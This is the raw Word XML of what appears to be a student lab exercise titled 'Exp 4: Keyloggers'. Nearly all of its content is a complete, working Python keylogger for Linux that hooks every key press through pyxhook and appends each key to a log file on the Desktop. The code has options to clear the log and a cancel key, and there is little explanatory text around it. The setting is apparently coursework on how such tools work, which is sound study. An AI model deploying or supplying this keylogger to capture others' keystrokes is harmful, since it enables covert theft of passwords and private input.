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833" w:rsidRDefault="003E483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E4833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exp </w:t>
      </w:r>
      <w:r w:rsidR="0082629C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003E4833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0082629C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4833" w:rsidRPr="003E4833" w:rsidRDefault="003E4833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3E4833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082629C" w:rsidRPr="0082629C" w:rsidRDefault="0082629C" w:rsidP="008262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</w:rPr>
      </w:pP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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># Python code for keylogger</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># to be used in linux</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>import os</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>import pyxhook</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t> </w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># This tells the keylogger where the log file will go.</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># You can set the file path as an environment variable ('pylogger_file'),</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># or use the default ~/Desktop/file.log</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>log_file = os.environ.get(</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    'pylogger_file',</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    os.path.expanduser('~/Desktop/file.log')</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># Allow setting the cancel key from environment args, Default: `</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>cancel_key = ord(</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    os.environ.get(</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>        'pylogger_cancel',</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>        '`'</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    )[0]</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t> </w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># Allow clearing the log file on start, if pylogger_clean is defined.</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>if os.environ.get('pylogger_clean', None) is not None:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    try:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>        os.remove(log_file)</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    except EnvironmentError:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>       # File does not exist, or no permissions.</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>        pass</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t> </w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>#creating key pressing event and saving it into log file</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>def OnKeyPress(event):</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    with open(log_file, 'a') as f:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>        f.write('{}\n'.format(event.Key))</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t> </w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># create a hook manager object</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>new_hook = pyxhook.HookManager()</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>new_hook.KeyDown = OnKeyPress</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t># set the hook</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>new_hook.HookKeyboard()</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>try:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    new_hook.start()         # start the hook</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>except KeyboardInterrupt:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    # User cancelled from command line.</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    pass</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>except Exception as ex:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    # Write exceptions to the log file, for analysis later.</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    msg = 'Error while catching events:\n  {}'.format(ex)</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    pyxhook.print_err(msg)</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>    with open(log_file, 'a') as f:</w:t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ar-SA"/>
        </w:rPr>
        <w:br/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FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>        f.write('\n{}'.format(msg))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4833" w:rsidRPr="00D84F11" w:rsidRDefault="003E483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84F11" w:rsidRDefault="00D84F1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84F11" w:rsidRPr="0082629C" w:rsidRDefault="00D84F11" w:rsidP="00D84F1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Output</w:t>
      </w:r>
      <w:r w:rsidRPr="003E4833"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</w:p>
    <w:p w:rsidR="00D84F11" w:rsidRPr="003E4833" w:rsidRDefault="0082629C" w:rsidP="00D84F11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val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="5591810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="7041269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126940" name="Picture 70412694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F11" w:rsidRPr="003E4833" w:rsidRDefault="00D84F11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D84F11" w:rsidRPr="003E4833" w:rsidSect="00CA6B1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5F4A" w:rsidRDefault="00955F4A" w:rsidP="003E4833">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00955F4A" w:rsidRDefault="00955F4A" w:rsidP="003E4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64BB" w:rsidRDefault="00E564B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64BB" w:rsidRDefault="00E564B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64BB" w:rsidRDefault="00E564B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5F4A" w:rsidRDefault="00955F4A" w:rsidP="003E4833">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00955F4A" w:rsidRDefault="00955F4A" w:rsidP="003E48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64BB" w:rsidRDefault="00E564B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64BB" w:rsidRDefault="00E564BB" w:rsidP="00E564BB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Reg no: 210701111       Name: Karthikeyan C</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="003E4833" w:rsidRPr="00E564BB" w:rsidRDefault="003E4833" w:rsidP="00E564B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64BB" w:rsidRDefault="00E564B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3E4833"/>
    <w:rsid w:val="00041AD1"/>
    <w:rsid w:val="001C65E2"/>
    <w:rsid w:val="00282AB9"/>
    <w:rsid w:val="003E4833"/>
    <w:rsid w:val="00463FFD"/>
    <w:rsid w:val="006B4B54"/>
    <w:rsid w:val="007042F5"/>
    <w:rsid w:val="0082629C"/>
    <w:rsid w:val="00955F4A"/>
    <w:rsid w:val="00CA6B1E"/>
    <w:rsid w:val="00D84F11"/>
    <w:rsid w:val="00E564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A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48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4833"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E48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4833"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E564B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4BB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7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5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9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Jesu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>karthi kn</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-08T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T18:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>